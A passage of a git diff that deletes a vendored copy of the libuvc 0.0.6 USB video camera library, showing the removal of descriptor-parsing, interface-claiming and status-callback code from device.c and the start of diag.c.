-    fprintf ( stderr, "attempt to claim already-claimed interface %d\n", idx );
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  /* Tell libusb to detach any active kernel drivers. libusb will keep track of whether
-   * it found a kernel driver for this interface. */
-  ret = libusb_detach_kernel_driver(devh->usb_devh, idx);
-
-  if (ret == UVC_SUCCESS || ret == LIBUSB_ERROR_NOT_FOUND || ret == LIBUSB_ERROR_NOT_SUPPORTED) {
-    UVC_DEBUG("claiming interface %d", idx);
-    if (!( ret = libusb_claim_interface(devh->usb_devh, idx))) {
-      devh->claimed |= ( 1 << idx );
-    }
-  } else {
-    UVC_DEBUG("not claiming interface %d: unable to detach kernel driver (%s)",
-              idx, uvc_strerror(ret));
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * Release a UVC interface.
- * @ingroup device
- *
- * @param devh UVC device handle
- * @param idx UVC interface index
- */
-uvc_error_t uvc_release_if(uvc_device_handle_t *devh, int idx) {
-  int ret = UVC_SUCCESS;
-
-  UVC_ENTER();
-  UVC_DEBUG("releasing interface %d", idx);
-  if (!( devh->claimed & ( 1 << idx ))) {
-    fprintf ( stderr, "attempt to release unclaimed interface %d\n", idx );
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  /* libusb_release_interface *should* reset the alternate setting to the first available,
-     but sometimes (e.g. on Darwin) it doesn't. Thus, we do it explicitly here.
-     This is needed to de-initialize certain cameras. */
-  libusb_set_interface_alt_setting(devh->usb_devh, idx, 0);
-  ret = libusb_release_interface(devh->usb_devh, idx);
-
-  if (UVC_SUCCESS == ret) {
-    devh->claimed &= ~( 1 << idx );
-    /* Reattach any kernel drivers that were disabled when we claimed this interface */
-    ret = libusb_attach_kernel_driver(devh->usb_devh, idx);
-
-    if (ret == UVC_SUCCESS) {
-      UVC_DEBUG("reattached kernel driver to interface %d", idx);
-    } else if (ret == LIBUSB_ERROR_NOT_FOUND || ret == LIBUSB_ERROR_NOT_SUPPORTED) {
-      ret = UVC_SUCCESS;  /* NOT_FOUND and NOT_SUPPORTED are OK: nothing to do */
-    } else {
-      UVC_DEBUG("error reattaching kernel driver to interface %d: %s",
-                idx, uvc_strerror(ret));
-    }
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * Find a device's VideoControl interface and process its descriptor
- * @ingroup device
- */
-uvc_error_t uvc_scan_control(uvc_device_t *dev, uvc_device_info_t *info) {
-  const struct libusb_interface_descriptor *if_desc;
-  uvc_error_t parse_ret, ret;
-  int interface_idx;
-  const unsigned char *buffer;
-  size_t buffer_left, block_size;
-
-  UVC_ENTER();
-
-  ret = UVC_SUCCESS;
-  if_desc = NULL;
-
-  uvc_device_descriptor_t* dev_desc;
-  int haveTISCamera = 0;
-  uvc_get_device_descriptor ( dev, &dev_desc );
-  if ( 0x199e == dev_desc->idVendor && ( 0x8101 == dev_desc->idProduct ||
-      0x8102 == dev_desc->idProduct )) {
-    haveTISCamera = 1;
-  }
-  uvc_free_device_descriptor ( dev_desc );
-
-  for (interface_idx = 0; interface_idx < info->config->bNumInterfaces; ++interface_idx) {
-    if_desc = &info->config->interface[interface_idx].altsetting[0];
-
-    if ( haveTISCamera && if_desc->bInterfaceClass == 255 && if_desc->bInterfaceSubClass == 1) // Video, Control
-      break;
-
-    if (if_desc->bInterfaceClass == 14 && if_desc->bInterfaceSubClass == 1) // Video, Control
-      break;
-
-    if_desc = NULL;
-  }
-
-  if (if_desc == NULL) {
-    UVC_EXIT(UVC_ERROR_INVALID_DEVICE);
-    return UVC_ERROR_INVALID_DEVICE;
-  }
-
-  info->ctrl_if.bInterfaceNumber = interface_idx;
-  if (if_desc->bNumEndpoints != 0) {
-    info->ctrl_if.bEndpointAddress = if_desc->endpoint[0].bEndpointAddress;
-  }
-
-  buffer = if_desc->extra;
-  buffer_left = if_desc->extra_length;
-
-  while (buffer_left >= 3) { // parseX needs to see buf[0,2] = length,type
-    block_size = buffer[0];
-    parse_ret = uvc_parse_vc(dev, info, buffer, block_size);
-
-    if (parse_ret != UVC_SUCCESS) {
-      ret = parse_ret;
-      break;
-    }
-
-    buffer_left -= block_size;
-    buffer += block_size;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * @brief Parse a VideoControl header.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_header(uvc_device_t *dev,
-				uvc_device_info_t *info,
-				const unsigned char *block, size_t block_size) {
-  size_t i;
-  uvc_error_t scan_ret, ret = UVC_SUCCESS;
-
-  UVC_ENTER();
-
-  /*
-  int uvc_version;
-  uvc_version = (block[4] >> 4) * 1000 + (block[4] & 0x0f) * 100
-    + (block[3] >> 4) * 10 + (block[3] & 0x0f);
-  */
-
-  info->ctrl_if.bcdUVC = SW_TO_SHORT(&block[3]);
-
-  switch (info->ctrl_if.bcdUVC) {
-  case 0x0100:
-    info->ctrl_if.dwClockFrequency = DW_TO_INT(block + 7);
-  case 0x010a:
-    info->ctrl_if.dwClockFrequency = DW_TO_INT(block + 7);
-  case 0x0110:
-    break;
-  default:
-    UVC_EXIT(UVC_ERROR_NOT_SUPPORTED);
-    return UVC_ERROR_NOT_SUPPORTED;
-  }
-
-  for (i = 12; i < block_size; ++i) {
-    scan_ret = uvc_scan_streaming(dev, info, block[i]);
-    if (scan_ret != UVC_SUCCESS) {
-      ret = scan_ret;
-      break;
-    }
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * @brief Parse a VideoControl input terminal.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_input_terminal(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block, size_t block_size) {
-  uvc_input_terminal_t *term;
-  size_t i;
-
-  UVC_ENTER();
-
-  /* only supporting camera-type input terminals */
-  if (SW_TO_SHORT(&block[4]) != UVC_ITT_CAMERA) {
-    UVC_EXIT(UVC_SUCCESS);
-    return UVC_SUCCESS;
-  }
-
-  term = calloc(1, sizeof(*term));
-
-  term->bTerminalID = block[3];
-  term->wTerminalType = SW_TO_SHORT(&block[4]);
-  term->wObjectiveFocalLengthMin = SW_TO_SHORT(&block[8]);
-  term->wObjectiveFocalLengthMax = SW_TO_SHORT(&block[10]);
-  term->wOcularFocalLength = SW_TO_SHORT(&block[12]);
-
-  for (i = 14 + block[14]; i >= 15; --i)
-    term->bmControls = block[i] + (term->bmControls << 8);
-
-  DL_APPEND(info->ctrl_if.input_term_descs, term);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoControl processing unit.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_processing_unit(uvc_device_t *dev,
-					 uvc_device_info_t *info,
-					 const unsigned char *block, size_t block_size) {
-  uvc_processing_unit_t *unit;
-  size_t i;
-
-  UVC_ENTER();
-
-  unit = calloc(1, sizeof(*unit));
-  unit->bUnitID = block[3];
-  unit->bSourceID = block[4];
-
-  for (i = 7 + block[7]; i >= 8; --i)
-    unit->bmControls = block[i] + (unit->bmControls << 8);
-
-  DL_APPEND(info->ctrl_if.processing_unit_descs, unit);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoControl selector unit.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_selector_unit(uvc_device_t *dev,
-					 uvc_device_info_t *info,
-					 const unsigned char *block, size_t block_size) {
-  uvc_selector_unit_t *unit;
-
-  UVC_ENTER();
-
-  unit = calloc(1, sizeof(*unit));
-  unit->bUnitID = block[3];
-
-  DL_APPEND(info->ctrl_if.selector_unit_descs, unit);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoControl extension unit.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_extension_unit(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block, size_t block_size) {
-  uvc_extension_unit_t *unit = calloc(1, sizeof(*unit));
-  const uint8_t *start_of_controls;
-  int size_of_controls, num_in_pins;
-  int i;
-
-  UVC_ENTER();
-
-  unit->bUnitID = block[3];
-  memcpy(unit->guidExtensionCode, &block[4], 16);
-
-  num_in_pins = block[21];
-  size_of_controls = block[22 + num_in_pins];
-  start_of_controls = &block[23 + num_in_pins];
-
-  for (i = size_of_controls - 1; i >= 0; --i)
-    unit->bmControls = start_of_controls[i] + (unit->bmControls << 8);
-
-  DL_APPEND(info->ctrl_if.extension_unit_descs, unit);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * Process a single VideoControl descriptor block
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc(
-    uvc_device_t *dev,
-    uvc_device_info_t *info,
-    const unsigned char *block, size_t block_size) {
-  int descriptor_subtype;
-  uvc_error_t ret = UVC_SUCCESS;
-
-  UVC_ENTER();
-
-  if (block[1] != 36) { // not a CS_INTERFACE descriptor??
-    UVC_EXIT(UVC_SUCCESS);
-    return UVC_SUCCESS; // UVC_ERROR_INVALID_DEVICE;
-  }
-
-  descriptor_subtype = block[2];
-
-  switch (descriptor_subtype) {
-  case UVC_VC_HEADER:
-    ret = uvc_parse_vc_header(dev, info, block, block_size);
-    break;
-  case UVC_VC_INPUT_TERMINAL:
-    ret = uvc_parse_vc_input_terminal(dev, info, block, block_size);
-    break;
-  case UVC_VC_OUTPUT_TERMINAL:
-    break;
-  case UVC_VC_SELECTOR_UNIT:
-    ret = uvc_parse_vc_selector_unit(dev, info, block, block_size);
-    break;
-  case UVC_VC_PROCESSING_UNIT:
-    ret = uvc_parse_vc_processing_unit(dev, info, block, block_size);
-    break;
-  case UVC_VC_EXTENSION_UNIT:
-    ret = uvc_parse_vc_extension_unit(dev, info, block, block_size);
-    break;
-  default:
-    ret = UVC_ERROR_INVALID_DEVICE;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * Process a VideoStreaming interface
- * @ingroup device
- */
-uvc_error_t uvc_scan_streaming(uvc_device_t *dev,
-			       uvc_device_info_t *info,
-			       int interface_idx) {
-  const struct libusb_interface_descriptor *if_desc;
-  const unsigned char *buffer;
-  size_t buffer_left, block_size;
-  uvc_error_t ret, parse_ret;
-  uvc_streaming_interface_t *stream_if;
-
-  UVC_ENTER();
-
-  ret = UVC_SUCCESS;
-
-  if_desc = &(info->config->interface[interface_idx].altsetting[0]);
-  buffer = if_desc->extra;
-  buffer_left = if_desc->extra_length;
-
-  stream_if = calloc(1, sizeof(*stream_if));
-  stream_if->parent = info;
-  stream_if->bInterfaceNumber = if_desc->bInterfaceNumber;
-  DL_APPEND(info->stream_ifs, stream_if);
-
-  while (buffer_left >= 3) {
-    block_size = buffer[0];
-    parse_ret = uvc_parse_vs(dev, info, stream_if, buffer, block_size);
-
-    if (parse_ret != UVC_SUCCESS) {
-      ret = parse_ret;
-      break;
-    }
-
-    buffer_left -= block_size;
-    buffer += block_size;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming header block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_input_header(uvc_streaming_interface_t *stream_if,
-				      const unsigned char *block,
-				      size_t block_size) {
-  UVC_ENTER();
-
-  stream_if->bEndpointAddress = block[6] & 0x8f;
-  stream_if->bTerminalLink = block[8];
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming uncompressed format block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_format_uncompressed(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size) {
-  UVC_ENTER();
-
-  uvc_format_desc_t *format = calloc(1, sizeof(*format));
-
-  format->parent = stream_if;
-  format->bDescriptorSubtype = block[2];
-  format->bFormatIndex = block[3];
-  //format->bmCapabilities = block[4];
-  //format->bmFlags = block[5];
-  memcpy(format->guidFormat, &block[5], 16);
-  format->bBitsPerPixel = block[21];
-  format->bDefaultFrameIndex = block[22];
-  format->bAspectRatioX = block[23];
-  format->bAspectRatioY = block[24];
-  format->bmInterlaceFlags = block[25];
-  format->bCopyProtect = block[26];
-
-  DL_APPEND(stream_if->format_descs, format);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming frame format block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_frame_format(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size) {
-  UVC_ENTER();
-
-  uvc_format_desc_t *format = calloc(1, sizeof(*format));
-
-  format->parent = stream_if;
-  format->bDescriptorSubtype = block[2];
-  format->bFormatIndex = block[3];
-  format->bNumFrameDescriptors = block[4];
-  memcpy(format->guidFormat, &block[5], 16);
-  format->bBitsPerPixel = block[21];
-  format->bDefaultFrameIndex = block[22];
-  format->bAspectRatioX = block[23];
-  format->bAspectRatioY = block[24];
-  format->bmInterlaceFlags = block[25];
-  format->bCopyProtect = block[26];
-  format->bVariableSize = block[27];
-
-  DL_APPEND(stream_if->format_descs, format);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming MJPEG format block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_format_mjpeg(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size) {
-  UVC_ENTER();
-
-  uvc_format_desc_t *format = calloc(1, sizeof(*format));
-
-  format->parent = stream_if;
-  format->bDescriptorSubtype = block[2];
-  format->bFormatIndex = block[3];
-  memcpy(format->fourccFormat, "MJPG", 4);
-  format->bmFlags = block[5];
-  format->bBitsPerPixel = 0;
-  format->bDefaultFrameIndex = block[6];
-  format->bAspectRatioX = block[7];
-  format->bAspectRatioY = block[8];
-  format->bmInterlaceFlags = block[9];
-  format->bCopyProtect = block[10];
-
-  DL_APPEND(stream_if->format_descs, format);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming uncompressed frame block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_frame_frame(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size) {
-  uvc_format_desc_t *format;
-  uvc_frame_desc_t *frame;
-
-  const unsigned char *p;
-  int i;
-
-  UVC_ENTER();
-
-  format = stream_if->format_descs->prev;
-  frame = calloc(1, sizeof(*frame));
-
-  frame->parent = format;
-
-  frame->bDescriptorSubtype = block[2];
-  frame->bFrameIndex = block[3];
-  frame->bmCapabilities = block[4];
-  frame->wWidth = block[5] + (block[6] << 8);
-  frame->wHeight = block[7] + (block[8] << 8);
-  frame->dwMinBitRate = DW_TO_INT(&block[9]);
-  frame->dwMaxBitRate = DW_TO_INT(&block[13]);
-  frame->dwDefaultFrameInterval = DW_TO_INT(&block[17]);
-  frame->bFrameIntervalType = block[21];
-  frame->dwBytesPerLine = DW_TO_INT(&block[22]);
-
-  if (block[21] == 0) {
-    frame->dwMinFrameInterval = DW_TO_INT(&block[26]);
-    frame->dwMaxFrameInterval = DW_TO_INT(&block[30]);
-    frame->dwFrameIntervalStep = DW_TO_INT(&block[34]);
-  } else {
-    frame->intervals = calloc(block[21] + 1, sizeof(frame->intervals[0]));
-    p = &block[26];
-
-    for (i = 0; i < block[21]; ++i) {
-      frame->intervals[i] = DW_TO_INT(p);
-      p += 4;
-    }
-    frame->intervals[block[21]] = 0;
-  }
-
-  DL_APPEND(format->frame_descs, frame);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming uncompressed frame block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_frame_uncompressed(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size) {
-  uvc_format_desc_t *format;
-  uvc_frame_desc_t *frame;
-
-  const unsigned char *p;
-  int i;
-
-  UVC_ENTER();
-
-  format = stream_if->format_descs->prev;
-  frame = calloc(1, sizeof(*frame));
-
-  frame->parent = format;
-
-  frame->bDescriptorSubtype = block[2];
-  frame->bFrameIndex = block[3];
-  frame->bmCapabilities = block[4];
-  frame->wWidth = block[5] + (block[6] << 8);
-  frame->wHeight = block[7] + (block[8] << 8);
-  frame->dwMinBitRate = DW_TO_INT(&block[9]);
-  frame->dwMaxBitRate = DW_TO_INT(&block[13]);
-  frame->dwMaxVideoFrameBufferSize = DW_TO_INT(&block[17]);
-  frame->dwDefaultFrameInterval = DW_TO_INT(&block[21]);
-  frame->bFrameIntervalType = block[25];
-
-  if (block[25] == 0) {
-    frame->dwMinFrameInterval = DW_TO_INT(&block[26]);
-    frame->dwMaxFrameInterval = DW_TO_INT(&block[30]);
-    frame->dwFrameIntervalStep = DW_TO_INT(&block[34]);
-  } else {
-    frame->intervals = calloc(block[25] + 1, sizeof(frame->intervals[0]));
-    p = &block[26];
-
-    for (i = 0; i < block[25]; ++i) {
-      frame->intervals[i] = DW_TO_INT(p);
-      p += 4;
-    }
-    frame->intervals[block[25]] = 0;
-  }
-
-  DL_APPEND(format->frame_descs, frame);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * Process a single VideoStreaming descriptor block
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs(
-    uvc_device_t *dev,
-    uvc_device_info_t *info,
-    uvc_streaming_interface_t *stream_if,
-    const unsigned char *block, size_t block_size) {
-  uvc_error_t ret;
-  int descriptor_subtype;
-
-  UVC_ENTER();
-
-  ret = UVC_SUCCESS;
-  descriptor_subtype = block[2];
-
-  switch (descriptor_subtype) {
-  case UVC_VS_INPUT_HEADER:
-    ret = uvc_parse_vs_input_header(stream_if, block, block_size);
-    break;
-  case UVC_VS_OUTPUT_HEADER:
-    fprintf ( stderr, "unsupported descriptor subtype VS_OUTPUT_HEADER\n" );
-    break;
-  case UVC_VS_STILL_IMAGE_FRAME:
-    fprintf ( stderr, "unsupported descriptor subtype VS_STILL_IMAGE_FRAME\n" );
-    break;
-  case UVC_VS_FORMAT_UNCOMPRESSED:
-    ret = uvc_parse_vs_format_uncompressed(stream_if, block, block_size);
-    break;
-  case UVC_VS_FORMAT_MJPEG:
-    ret = uvc_parse_vs_format_mjpeg(stream_if, block, block_size);
-    break;
-  case UVC_VS_FRAME_UNCOMPRESSED:
-  case UVC_VS_FRAME_MJPEG:
-    ret = uvc_parse_vs_frame_uncompressed(stream_if, block, block_size);
-    break;
-  case UVC_VS_FORMAT_MPEG2TS:
-    fprintf ( stderr, "unsupported descriptor subtype VS_FORMAT_MPEG2TS\n" );
-    break;
-  case UVC_VS_FORMAT_DV:
-    fprintf ( stderr, "unsupported descriptor subtype VS_FORMAT_DV\n" );
-    break;
-  case UVC_VS_COLORFORMAT:
-    fprintf ( stderr, "unsupported descriptor subtype VS_COLORFORMAT\n" );
-    break;
-  case UVC_VS_FORMAT_FRAME_BASED:
-    ret = uvc_parse_vs_frame_format ( stream_if, block, block_size );
-    break;
-  case UVC_VS_FRAME_FRAME_BASED:
-    ret = uvc_parse_vs_frame_frame ( stream_if, block, block_size );
-    break;
-  case UVC_VS_FORMAT_STREAM_BASED:
-    fprintf ( stderr, "unsupported descriptor subtype VS_FORMAT_STREAM_BASED\n" );
-    break;
-  default:
-    /** @todo handle JPEG and maybe still frames or even DV... */
-    //fprintf ( stderr, "unsupported descriptor subtype: %d\n",descriptor_subtype );
-    break;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * @brief Free memory associated with a UVC device
- * @pre Streaming must be stopped, and threads must have died
- */
-void uvc_free_devh(uvc_device_handle_t *devh) {
-  UVC_ENTER();
-
-  if (devh->info)
-    uvc_free_device_info(devh->info);
-
-  if (devh->status_xfer)
-    libusb_free_transfer(devh->status_xfer);
-
-  free(devh);
-
-  UVC_EXIT_VOID();
-}
-
-/** @brief Close a device
- *
- * @ingroup device
- *
- * Ends any stream that's in progress.
- *
- * The device handle and frame structures will be invalidated.
- */
-void uvc_close(uvc_device_handle_t *devh) {
-  UVC_ENTER();
-  uvc_context_t *ctx = devh->dev->ctx;
-
-  if (devh->streams)
-    uvc_stop_streaming(devh);
-
-  uvc_release_if(devh, devh->info->ctrl_if.bInterfaceNumber);
-
-  /* If we are managing the libusb context and this is the last open device,
-   * then we need to cancel the handler thread. When we call libusb_close,
-   * it'll cause a return from the thread's libusb_handle_events call, after
-   * which the handler thread will check the flag we set and then exit. */
-  if (ctx->own_usb_ctx && ctx->open_devices == devh && devh->next == NULL) {
-    ctx->kill_handler_thread = 1;
-    libusb_close(devh->usb_devh);
-    pthread_join(ctx->handler_thread, NULL);
-  } else {
-    libusb_close(devh->usb_devh);
-  }
-
-  DL_DELETE(ctx->open_devices, devh);
-
-  uvc_unref_device(devh->dev);
-
-  uvc_free_devh(devh);
-
-  UVC_EXIT_VOID();
-}
-
-/** @internal
- * @brief Get number of open devices
- */
-size_t uvc_num_devices(uvc_context_t *ctx) {
-  size_t count = 0;
-
-  uvc_device_handle_t *devh;
-
-  UVC_ENTER();
-
-  DL_FOREACH(ctx->open_devices, devh) {
-    count++;
-  }
-
-  UVC_EXIT((int) count);
-  return count;
-}
-
-void uvc_process_control_status(uvc_device_handle_t *devh, unsigned char *data, int len) {
-  enum uvc_status_class status_class;
-  uint8_t originator = 0, selector = 0, event = 0;
-  enum uvc_status_attribute attribute = UVC_STATUS_ATTRIBUTE_UNKNOWN;
-  void *content = NULL;
-  size_t content_len = 0;
-  int found_entity = 0;
-  struct uvc_input_terminal *input_terminal;
-  struct uvc_processing_unit *processing_unit;
-
-  UVC_ENTER();
-
-  if (len < 5) {
-    UVC_DEBUG("Short read of VideoControl status update (%d bytes)", len);
-    UVC_EXIT_VOID();
-    return;
-  }
-
-  originator = data[1];
-  event = data[2];
-  selector = data[3];
-
-  if (originator == 0) {
-    UVC_DEBUG("Unhandled update from VC interface");
-    UVC_EXIT_VOID();
-    return;  /* @todo VideoControl virtual entity interface updates */
-  }
-
-  if (event != 0) {
-    UVC_DEBUG("Unhandled VC event %d", (int) event);
-    UVC_EXIT_VOID();
-    return;
-  }
-
-  /* printf("bSelector: %d\n", selector); */
-
-  DL_FOREACH(devh->info->ctrl_if.input_term_descs, input_terminal) {
-    if (input_terminal->bTerminalID == originator) {
-      status_class = UVC_STATUS_CLASS_CONTROL_CAMERA;
-      found_entity = 1;
-      break;
-    }
-  }
-
-  if (!found_entity) {
-    DL_FOREACH(devh->info->ctrl_if.processing_unit_descs, processing_unit) {
-      if (processing_unit->bUnitID == originator) {
-        status_class = UVC_STATUS_CLASS_CONTROL_PROCESSING;
-        found_entity = 1;
-        break;
-      }
-    }
-  }
-
-  if (!found_entity) {
-    UVC_DEBUG("Got status update for unknown VideoControl entity %d",
-  (int) originator);
-    UVC_EXIT_VOID();
-    return;
-  }
-
-  attribute = data[4];
-  content = data + 5;
-  content_len = len - 5;
-
-  UVC_DEBUG("Event: class=%d, event=%d, selector=%d, attribute=%d, content_len=%zd",
-    status_class, event, selector, attribute, content_len);
-
-  if(devh->status_cb) {
-    UVC_DEBUG("Running user-supplied status callback");
-    devh->status_cb(status_class,
-                    event,
-                    selector,
-                    attribute,
-                    content, content_len,
-                    devh->status_user_ptr);
-  }
-  
-  UVC_EXIT_VOID();
-}
-
-void uvc_process_streaming_status(uvc_device_handle_t *devh, unsigned char *data, int len) {
-  
-  UVC_ENTER();
-
-  if (len < 3) {
-    UVC_DEBUG("Invalid streaming status event received.\n");
-    UVC_EXIT_VOID();
-    return;
-  }
-
-  if (data[2] == 0) {
-    if (len < 4) {
-      UVC_DEBUG("Short read of status update (%d bytes)", len);
-      UVC_EXIT_VOID();
-      return;
-    }
-    UVC_DEBUG("Button (intf %u) %s len %d\n", data[1], data[3] ? "pressed" : "released", len);
-    
-    if(devh->button_cb) {
-      UVC_DEBUG("Running user-supplied button callback");
-      devh->button_cb(data[1],
-                      data[3],
-                      devh->button_user_ptr);
-    }
-  } else {
-    UVC_DEBUG("Stream %u error event %02x %02x len %d.\n", data[1], data[2], data[3], len);
-  }
-
-  UVC_EXIT_VOID();
-}
-
-void uvc_process_status_xfer(uvc_device_handle_t *devh, struct libusb_transfer *transfer) {
-  
-  UVC_ENTER();
-
-  /* printf("Got transfer of aLen = %d\n", transfer->actual_length); */
-
-  if (transfer->actual_length > 0) {
-    switch (transfer->buffer[0] & 0x0f) {
-    case 1: /* VideoControl interface */
-      uvc_process_control_status(devh, transfer->buffer, transfer->actual_length);
-      break;
-    case 2:  /* VideoStreaming interface */
-      uvc_process_streaming_status(devh, transfer->buffer, transfer->actual_length);
-      break;
-    }
-  }
-
-  UVC_EXIT_VOID();
-}
-
-/** @internal
- * @brief Process asynchronous status updates from the device.
- */
-void LIBUSB_CALL _uvc_status_callback(struct libusb_transfer *transfer) {
-  UVC_ENTER();
-
-  uvc_device_handle_t *devh = (uvc_device_handle_t *) transfer->user_data;
-
-  switch (transfer->status) {
-  case LIBUSB_TRANSFER_ERROR:
-  case LIBUSB_TRANSFER_CANCELLED:
-  case LIBUSB_TRANSFER_NO_DEVICE:
-    UVC_DEBUG("not processing/resubmitting, status = %d", transfer->status);
-    UVC_EXIT_VOID();
-    return;
-  case LIBUSB_TRANSFER_COMPLETED:
-    uvc_process_status_xfer(devh, transfer);
-    break;
-  case LIBUSB_TRANSFER_TIMED_OUT:
-  case LIBUSB_TRANSFER_STALL:
-  case LIBUSB_TRANSFER_OVERFLOW:
-    UVC_DEBUG("retrying transfer, status = %d", transfer->status);
-    break;
-  }
-
-#ifdef UVC_DEBUGGING
-  uvc_error_t ret =
-#endif
-      libusb_submit_transfer(transfer);
-  UVC_DEBUG("libusb_submit_transfer() = %d", ret);
-
-  UVC_EXIT_VOID();
-}
-
-/** @brief Set a callback function to receive status updates
- *
- * @ingroup device
- */
-void uvc_set_status_callback(uvc_device_handle_t *devh,
-                             uvc_status_callback_t cb,
-                             void *user_ptr) {
-  UVC_ENTER();
-
-  devh->status_cb = cb;
-  devh->status_user_ptr = user_ptr;
-
-  UVC_EXIT_VOID();
-}
-
-/** @brief Set a callback function to receive button events
- *
- * @ingroup device
- */
-void uvc_set_button_callback(uvc_device_handle_t *devh,
-                             uvc_button_callback_t cb,
-                             void *user_ptr) {
-  UVC_ENTER();
-
-  devh->button_cb = cb;
-  devh->button_user_ptr = user_ptr;
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Get format descriptions for the open device.
- *
- * @note Do not modify the returned structure.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_format_desc_t *uvc_get_format_descs(uvc_device_handle_t *devh) {
-  return devh->info->stream_ifs->format_descs;
-}
-
diff --git a/thirdparty/libuvc-0.0.6/src/diag.c b/thirdparty/libuvc-0.0.6/src/diag.c
deleted file mode 100644
index fa17731..0000000
--- a/thirdparty/libuvc-0.0.6/src/diag.c
+++ /dev/null
@@ -1,355 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup diag Diagnostics
- * @brief Interpretation of devices, error codes and negotiated stream parameters
- */
-
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-/** @internal */
-typedef struct _uvc_error_msg {
-  uvc_error_t err;
-  const char *msg;
-} _uvc_error_msg_t;
-
-static const _uvc_error_msg_t uvc_error_msgs[] = {
-  {UVC_SUCCESS, "Success"},
-  {UVC_ERROR_IO, "I/O error"},
-  {UVC_ERROR_INVALID_PARAM, "Invalid parameter"},
-  {UVC_ERROR_ACCESS, "Access denied"},
-  {UVC_ERROR_NO_DEVICE, "No such device"},
-  {UVC_ERROR_NOT_FOUND, "Not found"},
-  {UVC_ERROR_BUSY, "Busy"},
-  {UVC_ERROR_TIMEOUT, "Timeout"},
-  {UVC_ERROR_OVERFLOW, "Overflow"},
-  {UVC_ERROR_PIPE, "Pipe"},
